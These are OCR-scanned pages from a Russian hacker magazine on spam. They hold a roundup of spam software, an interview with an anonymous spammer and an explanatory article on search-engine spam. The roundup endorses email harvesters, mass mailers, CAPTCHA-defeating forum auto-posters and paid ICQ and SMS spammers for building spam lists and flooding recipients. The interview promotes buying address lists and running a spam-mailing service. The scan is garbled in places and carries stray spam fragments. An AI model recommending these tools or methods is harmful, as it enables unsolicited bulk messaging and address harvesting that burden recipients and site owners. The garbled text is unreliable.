гими полезными функциями, такими как многопо- 
точность, управление через IRC и POPS. Но все же 
она далеко не совершенна, и в этой статье я далте- 
бе много советов по поводу того, как улучшить 
функциональность бота. Удачного кодинга! © 


http:/Awww.opennet.ru 
большая подборка документации, в TOM числе и по кодингу 


http:/Awww.rfes.org 
стандарты интернет RFC, здесь ты можешь найти подробную 
инфу о взаимодействии с протоколами POPS, SMTP u IRC 


http://www.codenet.ru 
подборка хорошей документации по кодингу, 
в том числе и по сетевому 
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viagra Cialis cost free 


Самый злобный и полезный инструментарий 


для спамера 


КАКОЙ ЖЕ СПАМ БЕЗ ИНСТРУМЕНТОВ И ТУЛЗ? В ПЛАНЕ СПАМЕРСКОГО СОФТА ОБЫЧНОЕ ПОНИМАНИЕ 
«HACK TOOLS» КАК ТАКОВЫХ НЕМНОГО МЕНЯЕТСЯ. ЗДЕСЬ ШАРОВАРНАЯ ПРОГРАММА, ПУЩЕННАЯ 

В МАССОВОЕ ИСПОЛЬЗОВАНИЕ, МОЖЕТ ОКАЗАТЬСЯ НЕЗАМЕНИМЫМ ИНСТРУМЕНТОМ СПАМЕРА. 
ПРИЧЕМ ДАЛЕКО НЕ ВСЕ ПРИВАТНЫЕ ПРОДУКТЫ БУДУТ РАБОТАТЬ ЛУЧШЕ И КАЧЕСТВЕННЕЕ 
ШАРОВАРНЫХ БРАТЬЕВ (ДА И ВЫБОР СПАМ-УТИЛИТ НЕ ОЧЕНЬ ВЕЛИК). ВСЕ САМОЕ ВКУСНОЕ, ВАЖНОЕ 
И ПОЛЕЗНОЕ МЫ СОБРАЛИ В ОДНУ НЕБОЛЬШУЮ СТАТЬЮ. ЗНАКОМЬСЯ НА ЗДОРОВЬЕ! 


Юрий Наумов aka Crazy_ Script (script @real.xakep.ru 


sunportoorp,med.ru 
support@mneaiLiu 
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E-MAILS HUNTER 1.46 
SHAREWARE ($20) 

Вся работа спамера начинается 
с большого (или не очень) и свежего 
спам-листа. Без него никуда! А где 
взять листы? Можно, конечно, купить 
где-нибудь на хакерском форуме, 
можно слезно попросить крутого ха- 
кера подарить небольшой листик, 
а можно — составить самому. При- 
чем последний вариант очень даже 
перспективен и реален. E-mails Hunter 
как раз предназначен для «выдира- 


ния» адресов электронной почты 
с указанных страниц в Сети. Таким 
образом, появляется возможность 
составить именно тот спам-лист, ко- 
торый больше всего подходит конк- 
ретному взломщику (например, по Te- 
матике грабимых сайтов). 

Весит это чудо всего 64 КЬ и от- 
личается от своих оппонентов доста- 
точно высокой скоростью работы. 
При этом существует возможность 


исключать из спам-листа адреса 
по маске (например аатт@ или 
@real.xakep.ru). Граббер не требует 
установки и без проблем работает че- 
рез прокси. Бесплатно можно полу- 
чить демо-версию программы на сай- 
те производителя. От полной она от- 
личается лишь тем, что «граб» ведет- 
ся каждый раз с одного указанного 
сайта, в отличие от цепочки страниц 
в полноценной версии. 


bulkemailfinder.com 

E-MAIL SPIDER EASY 4.9.2 
SHAREWARE 

Еще один представитель семейства 
«грабберов», но на этот раз от зарубеж- 
ного производителя. В отличие от свое- 
го брата, «паук» позволяет произвести 
более гибкую настройку выдирания ад- 
ресов. В качестве параметров для поис- 
ка указываются ключевые слова, кото- 


рые должны/не должны содержаться 
в списке найденных, максимальное ко- 
личество соединений и потоков. 
Файл-отчет также формируется 
по указанной маске (тай, mail&url, url, 
url&mail) в нужном формате (txt, html) 
для достижения большего удобства ис- 


пользования спам-листа в дальнейшем. 
И все же Spider работает чуть медлен- 
нее отечественного продукта. Тут стоит 
определиться с выбором: либо большая 
скорость, либо лучшее качество. Хотя 
эти факторы довольно-таки слабо вли- 
яют на работоспособность. 


ace-info.ru 
ACE FORM POSTER 3.6.4 
FREEWARE 
А это — необыкновенно гибкая утили- 
та для полностью автоматического 
заполнения Мт!-форм. С помощью 
нее автоматизируется и упрощается 
процесс отправки постов на форумы, 
гостевые книги, чаты, в разнообраз- 
ные каталоги, борды и так далее. 
Форма заполняется автоматически и 
отправляет данные на неограничен- 
ное число серверов. 

Все это осуществляется пу- 
тем специальной настройки файл- 


маски. Содержание маски состоит 
из настроек и адреса страницы, пе- 
речисления имен кнопок, их поряд- 
ка, полей ввода и информации, ко- 
торой, собственно, необходимо за- 
полнять те или иные поля. Напри- 
мер, заходим на форум с адресом 
http://myforum.com/forum.xhtml?- 
owner=username. В этом случае 
в маску необходимо будет доба- 
вить одно описание — ссылку 
на файл со списком ников. Значе- 


ния из файла будут браться пооче- 
редно и ставиться вместо перемен- 
ной username. Очень удобно. Весь 
процесс настройки и работы с прог- 
раммой качественно и подробно 
описан в справке к программе на 
русском языке. Уверен, что проб- 
лем с работой не возникнет, уж 
очень там все ясно написано. От- 
личный инструмент для спаминга 
по форумам и прочим присутствен- 
ным местам Глобальной сети. 
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Газыющения вашай информации на до 
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Всегс за несколько минчт о вас но 
потенциальных клиентов - http://www. 


kbbsoftware.com 

ADVANCED MASS SENDER 4.3 
SHAREWARE 

Этой программе мы можем по праву 
отдать первое место в нашем хит-па- 
раде. Я проникся ею еще года четыре 
назад, когда было модно мутить свои 
х-тимы :). Даже через модем скорость 
передачи писем тогда, благодаря 
поддержке пакетной отправки, дости- 
гала почти 400 штук в минуту! Прога 
имеет 100-процентную многопоточ- 
ность и возможность проводить рас- 
сылку через несколько Smtp-cepBepoB 
одновременно. По тем временам это 
было супер, да и сегодня неплохо. 


gasaw.com 
PANTERA 3 
SHAREWARE 
Pantera — продукт российского произ- 
водителя. Аналогично Form Poster'y, 
предназначена для размещения сооб- 
щений на форумах и досках объявле- 
ний. Версия PanteraEN выполняет те же 
функции, разве что заточена под англо- 
язычные ресурсы. Для работы с ними 
нужно заполнить необходимые поля 
информацией и выбрать тематику. Вы- 
бор тематики размещаемой информа- 
ции облегчают специально подобран- 
ные рубрики в самой программе. 
Рамега позволяет разместить 
объявления более чем на 700 серве- 


Утилита AMS имеет свой 
собственный высокопроизводитель- 
ный smtp-cepBep. Также в ее состав 
входит html-pegaktop с поддержкой 
таблиц, картинок и других подобных 
вещей (что немаловажно, когда 
спам рассылается в качестве рекла- 
мы), отличный прокси-чекер, под- 
робнейшая статистика с логами 
всех транзакций. В завершение хо- 
чу отметить предельно простой ин- 
терфейс софтины и простоту ее 
освоения. 


рах. База серверов постоянно обнов- 
ляется авторами программы и выкла- 
дывается на сайте. Хочу заметить, что 
в последней (третьей) версии перера- 
ботана вся концепция размещения со- 
общений, что позволяет использовать 
в качестве цели любые доски, в том 
числе и Te, которые защищены вводом 
кода картинки. За счет оптимизации 
потоков увеличилась скорость работы. 

Прога прекрасно работает через 
прокси-серверы. Легкость настройки 
и простой интерфейс делает Пантеру 
доступной каждому. 
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MAIL.RU CHECKER 1.0 

FREEWARE 

Специальная утилита, предназначен- 
ная для верификации электронных 
адресов на mail.ru. В принципе, рабо- 
тает быстро, но не работает через 
прокси, а это, как известно, косяк 
в плане спамерского софта. В слу- 


чае, если пользователь запретил по- 
казывать себя в результатах поиска, 
его электронный адрес будет поме- 
чаться как несуществующий. 

В общем, инструмент не самый 
лучший в мире, но может пригодиться. 
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massmail.ru 

ПРОДУКТЫ ADVANCED 
SHAREWARE 

Контора Advanced написала ряд npor- 
рамм для работы со спам-листами и 
рассылками сообщений. Их продукты 
могут удовлетворить запросы самых 
требовательных спамеров. Помимо 
грабберов адресов и рассылки дан- 
ных, у них есть и другие тулзы. Напри- 
мер, качественный чекер адресов High 
Spedd Verifier. OH четко и быстро про- 
веряет адреса на валидность, удаляет 


из списка нерабочие мыльницы. 
Почтовый ремейлер Advanced Direct 
Remailer позволит скрыть свой настоя- 
щий адрес и анонимно отправить сооб- 
щение на любой ящик. 

На massmail.ru можно подробно 
ознакомиться с каждым из продуктов, 
а после ознакомления — забыть этот 
адрес и никогда в жизни не рассы- 
лать спам! 
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ПРИВАТНЫЕ 
ПРОДУКТЫ 


{private.inattack.ru} 

01 СМС cnamep/ $30. За принцип pa- 
боты спамера взят довольно-таки 
свежий сервис тай.ги agent'a no отп- 
равке смс. Соответственно, для про- 
ведения спаминга понадобятся поч- 
товые аккаунты этой почтовой служ- 
бы. От количества аккаунтов будет 
зависеть и скорость (сервис блокиру- 
ется на 1 минуту после отправки). 
Есть поддержка socks, русского язы- 
ка, основных русских операто- 

ров (Мегафон, МТС, Билайн). 


02 Май.ги Agent Spamer / $70. Npor- 
рамма может как спамить по собран- 
ной базе адресов, так и совмещать 
спаминг с предварительным грабом 
адресов с ресурса. В особенности 
тулзы входят возможность работы 
через socks и многопоточность — 
рассылка сообщений нескольким 
пользователям одновременно. 


03 Imtale/ $100. Отличный инстру- 
мент для спама по icq. Прекрасно ра- 
ботает с потоками через прокси, при- 
чем автоматически удаляет из спис- 
ка нерабочие. Блокировки прокси 

не происходит, тулза сама вовремя 
меняет адрес и продолжает работу. 
Разнообразные параметры посылки 
сообщений и авторизаций, отличная 
система мониторинга проведенной 
работы и многое другое. 


04 INSTA2 / $10. Очень функциональ- 
ный спамер по протоколу icq. По воз- 
можностям не уступает IMtale. Ведет 
лог-файл ответов, работает через 
socks, поддерживает функции «сооб- 
щение-ответ-ответ». 
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НЕКТО 
SPAMER 


{ID} 

Весьма известный спамер, 
пожелавший остаться инкогнито. 
А вот когда, как и с кем он работал, 
ты узнаешь из этого интервью. 


= #1 


i: : 


наши письма 
доходят всем! 


Разговор с известным спамером 


ЧЕЛОВЕК, РАССЫЛАЮЩИЙ СОТНИ ТЫСЯЧ НЕПРОШЕННЫХ ПИСЕМ, РАССКАЗЫВАЕТ 


О СВОЕЙ ДЕЯТЕЛЬНОСТИ 


О: Как давно ты занимаешься спамин- 
гом? Что подвигло начать это дело? 
А: Пять лет назад у меня был интерес- 
ный период в жизни (сразу после разво- 
да спервой женой), когда меня не инте- 
ресовало ничего кроме водки, покера 
и телок. Денег особо не было, жил 
в съемной хате в Царицыно с прияте- 
лем, был весь в долгах и так далее. 
В один прекрасный момент мне все на- 
доело, и я подался на «любимый» мно- 
гими сайт JOB.RU. Там совершенно слу- 
чайно наткнулся на вакансию от Димет- 
риуса (думаю, знаешь такого). Ну, при- 
шел к нему и в итоге ввязался в спам. 
Знание компов (с компами я с 11 лет) 
и здравое любопытство сыграло реша- 
ющую роль. Ну, и бабки, конечно. 

О: Нашел себя? 

А: Я не могу сказать, что нашел себя. 
Я, знаешь ли, многогранная натура, 
и спам — далеко не единственное мое 
занятие. 


О: Есть еще какие-то? Расскажешь? 
А: Да, есть. Заведую лабораторией 
по созданию систем искусственного 
интеллекта. Также я владелец компа- 
нии по производству игрового програ- 
ммного обеспечения. А остальное — 
не по профилю журнала «СПЕЦ», 
так что не интересно будет. 

О: Внушает :). Сколько тебе лет? 
Какое образование? 

A: Мне 32. Образование высшее тех- 
ническое. 

О: Сейчас многие европейские стра- 
ны (в том числе и РФ) объединяются 
в коалицию для совместной разра- 
ботки законопроектов, направлен- 
ных на пресечение распространения 
спама. Принесет ли это какой-нибудь 
ощутимый эффект? 

А: Вряд ли. Это не единственный слу- 
чай, когда страны пытаются создать 
какие-нибудь общие законопроекты. 
Международно-правовых норм при- 


нято огромное количество, вот только 
соблюдаются ли они должным обра- 
зом? Скорее всего, так будет и в этом 
случае. Возможно, в других странах 
эти законопроекты будут работать, но 
у нас... Принять можно любой закон, 
это не проблема, гораздо тяжелее до- 
биться его соблюдения. У нас доста- 
точно суровые санкции за убийства, 
но становится ли их меньше? Нет, 
а это одно из самых серьезных прес- 
туплений. Что тогда можно говорить 
о рекламе? 

О: Расскажи про ELPHISOFT? Что это 
за контора? Как она появилась? 

А: Компанию я организовал сразу 
после того, как наши с Диметриусом 
пути разошлись (огромный ему рес- 
пект). Первым продуктом был 
Reactor Mailer — система для массо- 
вых рассылок с управлением через 
веб-интерфейс. Была реализована 
довольно интересная кластерная 


технология. Насколько мне извест- 
но, это был первый в мире кластер- 
ный мейлер с неограниченно нара- 
щивающейся мощностью. Система 
стала пользоваться большой попу- 
лярностью и успешно конкурировала 
с ДМС, еще одним известным про- 
дуктом того времени. 

О: Чем вы занимались вместе 

с Диметриусом? И почему ваши пути 
все же разошлись? 

А: У нас немного разные подходы 
к ведению бизнеса. Помимо этого, 
я никогда не умел работать на кого-то, 
другими словами — два начальника 
под одной крышей не ужились. Одна- 
ко яему беспредельно благодарен за 
те времена. 

О: Насколько Reactor Mailer востребо- 
вана на сегодняшний день? 

А: На сегодняшний день Reactor Mai- 
ler (вернее, вторая ее версия) являет- 
ся одним из четырех методов рассыл- 
ки спама вообще. То есть четверть 
рынка спам-софта принадлежит 
именно нашей системе. 

О: Это же очень даже неплохой доход. 
А: Все познается в сравнении. 

О: Сколько лет системе? 

А: Около четырех лет. 

О: Кто участвовал в разработке 
системы? Ее основа была 

твоей идеей? 

A: Идея Reactor Mailer полностью при- 
надлежит одному человеку, мне. Раз- 
работчики действовали строго по мо- 
ему ТЗ, однако привносили и свои ин- 
тересные наработки. Некоторые идеи 
поступали также и от пользователей 
в процессе длительного тестирова- 


ния. Кстати, могу отметить, что разра- 
батывали систему одни из лучших ко- 
деров бывшего СНГ. 

О: Как тебе удалось так успешно 
собрать команду и соорудить 
настолько эффективный проект? 

А: Эффективность проекта была ясна 
заранее, не потребовался даже биз- 
нес-план. А то, что я вышел на отлич- 
ных исполнителей... Ну, что же, ищу- 
щий да обрящет. К тому же я никогда 
не скупился на оплату достойного тру- 
да и всегда был честен со своими ра- 
ботниками. А это, без ложной скром- 
ности, редкое качество в спам-бизне- 
се, да и в бизнесе вообще. 

О: Насколько сейчас эффективно 
заниматься спамингом (например, 
начинающим) с помощью своих 
спам-листов и публичного софта? 
Реально на этом заработать? 

А: Это зависит от многих факторов, 
например, от качества этих самых 
спам-листов. А вообще, с точки зре- 
ния спама, начинающий от корифея 
ничем не отличается. Разве что спа- 
мить они будут разные темы. Так что 
если у новичка есть нормальные 
спам-базы, начальный капитал и же- 
лание, то мой ответ — да. Заработать 
реально. 

О: Если самому составлять листы 

с помощью, например, таких 
программ, как e-mail hunter 

и подобных грабберов по сайтам? 

А: С помощью грабберов много не 
насобираешь. Тут нужно четко пони- 
мать, что спам — это массовая рек- 
лама, а не целевая. Поэтому для на- 
чала вам нужна спам-база как мини- 


ТУР 
JO пох diy 


MYM на миллион адресов (например, 
рунета), чтобы почувствовать отдачу. 
Базы покупаются, а не собираются. 
Собирать базы — занятие точно не 
для новичков. Кстати говоря, Reactor 
Майег был сделан именно для нович- 
ков, чтобы они не ломали себе голо- 
ву вопросами типа «что подставить 
в hello» и как составить грамотный 
аутлук-шаблон. Там за него все де- 
лает автоматика. 

О: Кто собирает спам-листы? 

Где можно купить качественный 
спам-лист? И насколько высока 
вероятность «кидалова»? 

А: Спам-листы собирают специаль- 
ные люди. У них свой бизнес и нала- 
женные технологические процессы. 
Эти специальные люди тусуются 
в специальных местах :). Вероятность 
кидалова ЧРЕЗВЫЧАЙНО высока. 
О: О «специальных местах» 
поведаешь? 

A: Эти места несложно найти самому. 
Гугл еще никто не отменял. 

О: А что тогда используют 
«корифеи» для спаминга, если 

твоя система для новичков? 

А: Моя система удовлетворяет всех, 
от новичков до профессионалов. 

О: ОК, давай немного о публичном 
софте для массовых рассылок. 
Насколько он является 
эффективным инструментом? 
Например, тот же Advanced Mass 
Зепаег. Какие факторы играют 

роль при выборе инструментов? 

А: Обычно пользователи хотят не ско- 
рость, а отдачу. На самом деле, мне тя- 
жело говорить про АМС, поскольку я 
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знаю и очень уважаю его автора. 
Для микроспама АМС, думаю, вполне 
пригоден и сейчас. Для рассылок по 
подписчикам тоже вполне. Короче, там, 
где не надо бороться с лингвистически- 
ми фильтрами и прочим, там, где не 
нужны суперскорости, суперпробивы и 
так далее. Advanced Mass Sender очень 
достойный продукт. Максиму Терентье- 
ву персональный респект от меня. 

О: С кем еще из личностей 

в мире спама ты общаешься? 

Есть знакомые не из России? 

А: Из России практически со всеми. 
Есть контакты и вне нашей Родины. 
О: В работе с клиентами ты ставишь 
на кон свою многолетнюю 
репутацию... Клиенты о 

хотно верят? Или они сначала 
проверяют твое имя? 

А: Нет, тут моя репутация бежит впе- 
реди, я иногда даже сам удивляюсь. 
Частенько бывают сценарии, когда 
сначала на кошелек молча падает 
увесистая сумма в $$$, потом через 
несколько часов (!) приходит в асю со- 
вершенно новый контакт, говорит, что 
меня ему порекомендовали, и просит 
сделать аккаунт. 

О: А как проходит работа 

с клиентами? 

А: Клиенты кидают сумму по прайсу, 
затем стучатся ко мне (или наоборот), 
ияим делаю их аккаунт по опреде- 
ленному тарифу. Все именно так. 

О: Напоследок, что бы ты 
посоветовал людям, которые 

только собираются заняться 
спам-бизнесом? С чего им начать? 

С чтения Уголовного Кодекса © 
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кровати 
для дома 
Поисковый спам 


В НАЧАЛЕ 2006 ГОДА ЗЕМЛЮ ОБЛЕТЕЛА 
НОВОСТЬ О ТОМ, ЧТО ОФИЦИАЛЬНЫЙ 
НЕМЕЦКИЙ САЙТ КОНЦЕРНА BMW НАКАЗАН 
ПОИСКОВОЙ СИСТЕМОЙ GOOGLE 

ЗА ИСПОЛЬЗОВАНИЕ НЕЭТИЧНЫХ 
«ПОРНО-ТЕХНОЛОГИЙ» ПРИ ПРОДВИЖЕНИИ 
САЙТА В РЕЙТИНГЕ 


> BMW и порно-технологии. Сайт всемирно из- 
вестной компании занимал лидирующие позиции 
в Google по наиболее популярным поисковым запро- 
сам, используя методы поискового спама. В резуль- 
тате чего был признан нарушителем «закона» и зане- 
сен в «черный список» поисковой системы — заба- 
нен (от английского ban — запрещать, налагать зап- 
рет). Казалось бы, где же тут развернуться спамеру? 
> = ктоипочему не любит поисковый спам. В пер- 
вую очередь, это поисковые системы. Они изна- 
чально заинтересованы в том, чтобы любой чело- 
век мог быстро найти то, что ему нужно. Если все 
сайты играют по правилам, то на первом месте 
в результатах поиска будет стоять сайт, наиболее 
релевантный запросу пользователя, то есть в боль- 
шей степени соответствующий/совпадающий/отве- 
чающий запросу. Методы поискового спама нап- 
равлены на то, чтобы обмануть логику поисковой 
машины и разместить свой сайт в рейтинге выше, 
чем он того заслуживает на самом деле. Либо что- 
бы привлечь посетителей на сайт обманным путем. 
Как и было с компанией BMW — люди искали «по- 
держанные автомобили», а находили новенькие 


штраф за допинг 


КАЖДЫЙ ВЛАДЕЛЕЦ САЙТА ИМЕЕТ 
ПРАВО САМОСТОЯТЕЛЬНО ПРИНИМАТЬ 
РЕШЕНИЕ — ИСПОЛЬЗОВАТЬ ИЛИ 

НЕ ИСПОЛЬЗОВАТЬ ЗАПРЕТНЫЕ 
СПОСОБЫ ПРОДВИЖЕНИЯ СВОИХ ТОВА- 
РОВ ИЛИ УСЛУГ В СЕТИ. ОДНАКО 
АДМИНИСТРАЦИЯ ПОИСКОВОЙ СИСТЕ- 
МЫ ВПРАВЕ ИСКЛЮЧИТЬ САЙТ-НАРУШИ- 
ТЕЛЬ ИЗ РЕЗУЛЬТАТОВ ПОИСКА. САЙТ, 
КОТОРЫЙ ЕЩЕ ВЧЕРА ЗАНИМАЛ ПОЧЕТ- 
НЫЕ МЕСТА В ПЕРВОЙ 10-КЕ РЕЗУЛЬТА- 
ТОВ ПОИСКА, ЗАВТРА НЕ ПРОСТО «УХО- 
ДИТ» НА ВТОРУЮ ИЛИ ТРЕТЬЮ СТРАНИ- 
ЦУ — ОН ВЫЛЕТАЕТ ИЗ РЕЙТИНГА СОВ- 
СЕМ И НАДОЛГО. ЭТО МОЖНО СРАВНИТЬ 
С ДИСКВАЛИФИКАЦИЕЙ СПОРТСМЕНА 
ЗА ПРИМЕНЕНИЕ ДОПИНГА. НАРУШИЛ — 
ОТБЫВАЙ СРОК. 


авто по ценам в 3-5 раз выше, чем хотелось бы. По- 
исковая система, которая смотрит на поисковый 
спам сквозь пальцы или просто экономит на анти- 
спамерских акциях, в конце концов потеряет своих 
пользователей. 

Во-вторых, это владельцы веб-сайтов. Дей- 
ствительно полезных и качественных ресурсов, ко- 
торые не обманывают пользователей в Сети, не 
расходуют трафик офисных работников на всплы- 
вающие окна и редиректы (автоматическая переад- 
ресация на другой сайт, который тебе вообще не 
был нужен). Эти люди заслуживают уважения и не 
должны скучать без работы только потому, что кон- 
куренты обманывают всех подряд, используя поис- 
ковый спам. В интернете многие занимаются поис- 
ковым продвижением сайтов. Однако лишь 5% из 
них делают это с умом, чтобы дать людям именно 
то, что они ищут. У каждого товара есть определен- 
ные характеристики и предназначение. Например, 
ты продаешь красивую и качественную мебель — 
шкафы-купе. У тебя большой ассортимент, покупа- 
тели, довольные сервисом. Значит, твой сайт дос- 
тоин лидирующих позиций по запросу «шкафы-ку- 
пе». Но если твой сосед в рейтинге продает только 
стулья — ты будешь возмущаться, ведь он, исполь- 
зуя спам, пытается «впарить» стулья тем, кто ищет 
шкаф-купе! По своей сути все виды действий, спо- 
собствующие росту популярности без какого-либо 
улучшения истинной ценности сайта, являются спа- 
мом. Если бы каждый владелец сайта делал акцент 


на своих собственных преимуществах, вместо того, 
чтобы накручивать счетчики и обманными путями 
завлекать посетителей на сайт, поисковые системы 
были бы напрямую заинтересованы в развитии 
рынка SEO-ycnyr (Search Engine Optimization, в ne- 
реводе с английского — «оптимизация под поиско- 
вые системы»), а не придумывали новые правила 
«естественного» отбора. 

И, конечно же, сами пользователи. Если ты 
ищешь порнографию — ты хочешь находить пор- 
нографию, черт с ней! Но если ты ищешь порногра- 
фию и вдруг попадаешь на сайт BMW? Закрыть 
сайт BMW и повторить попытку со следующей ссыл- 
кой, не так ли :)? 

Итак, что нужно делать, чтобы твой сайт (a еще 
хуже — сайт твоего клиента) гарантированно попал 
в бан-лист поисковой системы? Правильно — нужно 
использовать методы поискового спама! 

Поэтому пойдем от обратного, предупреж- 
ден — значит, вооружен! Попасть в бан-лист твой 
сайт может только при наличии признаков поиско- 
вого спама на самом сайте, в противном случае по- 
исковый спам стал бы главным оружием в борьбе 
с конкурентами в Сети. 
> = спам или не спам. Все относительно. Ни одна 
поисковая система не дает четких и однозначных 
рекомендаций, что является поисковым спамом, 
ачто — нет. Решение «казнить нельзя помиловать» 
принимается не программой, а человеком. Поэтому 
где будет стоять запятая, зависит исключительно от 


субъективного мнения конкретного сотрудника, ко- 
торый может просто не выспаться накануне. 


1 СЛИШКОМ БОЛЬШАЯ ПЛОТНОСТЬ КЛЮ- 
ЧЕВЫХ СЛОВ НА СТРАНИЦЕ. ПОИСКО- 
ВАЯ МАШИНА НЕ МОЖЕТ ОЦЕНИТЬ ДИ- 
ЗАЙН САЙТА, НО МОЖЕТ ОЦЕНИТЬ ТЕКС- 
ТОВУЮ СОСТАВЛЯЮЩУЮ. ЧЕМ ГРАМОТ- 
НЕЕ ОПТИМИЗИРОВАНЫ ТЕКСТЫ — ТЕМ 
ВЫШЕ САЙТ БУДЕТ В РЕЙТИНГЕ. НАПРИ- 
МЕР, САЙТ ПОСВЯЩЕН ШПИНГАЛЕТАМ. 
НА ТАКОМ САЙТЕ УМЕСТЕН СЛЕДУЮЩИЙ 
ТЕКСТ: «В НАШЕМ ИНТЕРНЕТ-МАГАЗИНЕ 
«ШПИНГАЛЕТ» ВЫ СМОЖЕТЕ НАЙТИ 
НАИБОЛЕЕ ПОПУЛЯРНЫЕ МОДЕЛИ 
ШПИНГАЛЕТОВ. ШПИНГАЛЕТ ИДЕАЛЬНО 
ПОДХОДИТ ДЛЯ ЗАЩЕЛКИВАНИЯ ВСЕ- 
ВОЗМОЖНЫХ ДВЕРЕЙ И ДВЕРЕЦ. ШПИН- 
ГАЛЕТ ШПИНГАЛЕТУ POSHb...». 


2 ИЗБЫТОЧНОЕ ИСПОЛЬЗОВАНИЕ ТАК 
НАЗЫВАЕМЫХ «УСИЛИТЕЛЕЙ ТЕКСТА». 
ТЕКСТОВУЮ СОСТАВЛЯЮЩУЮ САЙТА, 
ЦЕННОСТЬ ТЕКСТА ДЛЯ ПОИСКОВОЙ 
МАШИНЫ МОЖНО ИСКУССТВЕННО ЗА- 
ВЫСИТЬ, ЗЛОУПОТРЕБЛЯЯ ТЕГА- 

МИ <H1>, <B> ИЛИ <STRONG> (<Н1>НАШИ 
ШПИНГАЛЕТЫ — САМЫЕ ЛУЧШИЕ ШПИН- 
ГАЛЕТЫ В МИРЕ!<Н1>). ТОЛЬКОЙ ПОЙМИ 
ПРАВИЛЬНО, ПОИСКОВЫМ СПАМОМ ЯВ- 
ЛЯЕТСЯ НЕ ПРОСТО ВЫДЕЛЕНИЕ ЗАГО- 
ЛОВКА ТЕГОМ <Н1> (ЧТО НЕ ЗАПРЕЩА- 
ЕТСЯ), А ЗЛОУПОТРЕБЛЕНИЕ ИМ. НАП- 
РИМЕР, КОГДА УСИЛИВАЕТСЯ ВЕСЬ 
ТЕКСТ НА СТРАНИЦЕ, НЕ ЯВЛЯЮЩИЙ- 
СЯ ЗАГОЛОВКОМ. 


3 ДОРВЕИ (DOORWAYS). ДЕЛАЕТСЯ MHO- 
ЖЕСТВО БЕСПОЛЕЗНЫХ ДЛЯ ПОЛЬЗО- 
ВАТЕЛЕЙ СТРАНИЧЕК, ДО ОТКАЗА НАБИ- 
ТЫХ КЛЮЧЕВЫМИ СЛОВАМИ. ПОСЕТИ- 
ТЕЛЬ, ПОПАДАЯ НА ДОРВЕЙ, АВТОМАТИ- 
ЧЕСКИ ПЕРЕНАПРАВЛЯЕТСЯ НА ДРУГОЙ 
САЙТ, КОТОРЫЙ САМ ПО СЕБЕ МОЖЕТ 

И НЕ ПРОДВИГАТЬСЯ В ПОИСКОВОЙ 
СИСТЕМЕ. ПО СУТИ, ДОРВЕИ — 

ЭТО МНОЖЕСТВЕННЫЕ ДВЕРИ, ВЕДУ- 
ЩИЕ НА ОДИН И ТОТ ЖЕ САЙТ. ДОРВЕИ 
ЯВНО НАРУШАЮТ ЛИЦЕНЗИИ ПОИСКО- 
ВЫХ СИСТЕМ, ПОЭТОМУ ИХ ПРОЩЕ 
ПРОДВИНУТЬ В ТОП ПОИСКОВОЙ СИС- 
ТЕМЫ, НО ТАК ЖЕ ЛЕГКО И ПОТЕРЯТЬ. 
ВЕДЬ ДОРВЕЙ — ТАКОЙ ЖЕ САЙТ, КОТО- 
РЫЙ ТОЧНО ТАК ЖЕ МОЖЕТ БЫТЬ ЗАНЕ- 
СЕН В «ЧЕРНЫЙ СПИСОК» ПОИСКОВИКА. 
ИНТЕРЕСНО, ЧТО, ИСПОЛЬЗУЯ ДОРВЕИ, 
МОЖНО НЕ ЗАБОТИТЬСЯ О ТОМ, ЗАБА- 
НЕН ЛИ ОСНОВНОЙ САЙТ ИЛИ НЕТ. 


4 НЕТЕМАТИЧЕСКИЙ ОБМЕН ССЫЛКАМИ. 
ТЫ ЗАХОДИШЬ НА САЙТ ПИЦЦЕРИИ 
И ВИДИШЬ ВНИЗУ КАЖДОЙ СТРАНИЦЫ 


+ aemes | фожньй филыв | gemma | tee | ome 


BMW Deutschland >> 


Das neve BMW Jer Cabrio. 
Die perfekte Verbindung 
zwischen Himmel! und Strafe. 
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Ищешь порно, a находишь BMW 


ССЫЛКИ НА САЙТЫ СОВЕРШЕННО ДРУ- 
ГИХ ТЕМАТИК. ЭТО МОГУТ БЫТЬ САЙТЫ 
АВТОМОБИЛЬНЫХ, ЮРИДИЧЕСКИХ ИЛИ 
СТРОИТЕЛЬНЫХ ФИРМ. ЯСНО, ЧТО ТЕБЕ 
ВСЕ ЭТО НЕ НАДО — ВЕДЬ ТЫ ХОЧЕШЬ 
ЗАКАЗАТЬ ПИЦЦУ. ПРИЧИНОЙ МОЖЕТ 
БЫТЬ И БОЛЬШОЙ КАТАЛОГ НЕТЕМАТИ- 
ЧЕСКИХ ССЫЛОК, ЧТО ТАКЖЕ ПРИРАВ- 
НИВАЕТСЯ К ПОИСКОВОМУ СПАМУ И НА- 
КАЗЫВАЕТСЯ БАНОМ. ТАКИЕ БЕСПОРЯ- 


ДОЧНЫЕ СКОПЛЕНИЯ ССЫЛОК ЕЩЕ НА- 
ЗЫВАЮТ «ЛИНКОПОМОЙКАМИ». 


> светлое будущее. Поисковые системы посто- 
янно эволюционируют, для борьбы с поисковым спа- 
мом разрабатываются все новые фильтры. Но поис- 
ковый спам был, есть и будет. И победить его способ- 
но только уважение к другим пользователям Сети, 
атакже общий культурный уровень специалистов, за- 
нимающихся поисковым продвижением сайтов © 


ЗРЕС'!АЕОНЕНИЕ 
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КАРОЛИК 
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СПРОС НА УСЛУГИ ОПТИМИЗАТОРОВ САЙТОВ СТАБИЛЬНО СУЩЕСТВУЕТ 
И ВДОБАВОК РАСТЕТ. НО ТАК ЛИ ВСЕ ХОРОШО НА САМОМ ДЕЛЕ? 


Спрос рождает предло- 
жение, и, вследствие 
нарастающей конку- 
ренции между сайтами, 
цена вопроса все вре- 
мя растет. Грубые же 
ошибки в основном до- 
пускают новички. И по- 
ка ты учишься на своих 


ошибках, страдают хватает. А в итоге — 


твои клиенты, а поиско- 
вые системы грозят ба- 
ном. Беда же в другом 
— армия новичков пос- 
тоянно растет, так как 
старожилов рынка оп- 
тимизации на всех же- 
лающих банально не 


попадет всем. Соблазн 
в основном из-за того, 
что со стороны 
кажется, будто бы 
делать особо ничего не 
надо, а для старта 
достаточно нескольких 
статей по теме. 


Kak ни печально об этом говорить, HO рынок «Be- 
ерных» рекламных рассылок уже сложился, оди- 
ночки уши в туман, а на арену вышли крупные иг- 
роки, борющиеся не только с фильтрами, но и со 
своими коллегами по «цеху». Дилетантам здесь не 
место, и в конкурентной борьбе побеждает либо 
сильнейший (в смысле ширины каналов), либо ум- 
нейший. Спамеры активно пользуются вирусными 
наработками и тщательно изучают все образцы 
оружия, предназначенного для борьбы с ними. Но, 
как учит военная мудрость, «не рой яму другому, 
чтобы он не использовал ее как окоп». 

Прежде чем приступать к рассылке, опытный 
спамер обязательно установит у себя последние 


вы 
|. 


